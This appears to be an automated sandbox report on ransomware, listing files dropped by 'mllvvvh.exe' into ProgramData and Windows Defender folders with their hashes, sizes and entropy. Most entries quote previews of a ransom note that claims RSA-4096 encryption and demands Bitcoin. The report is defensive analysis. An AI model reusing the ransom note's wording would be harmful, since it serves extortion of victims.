                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\WinMSIPC\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Temp\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Temp\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Temp\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Clean Store\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Clean Store\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Clean Store\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Default\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Default\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Default\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\NisBackup\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\NisBackup\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\NisBackup\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Updates\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Updates\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
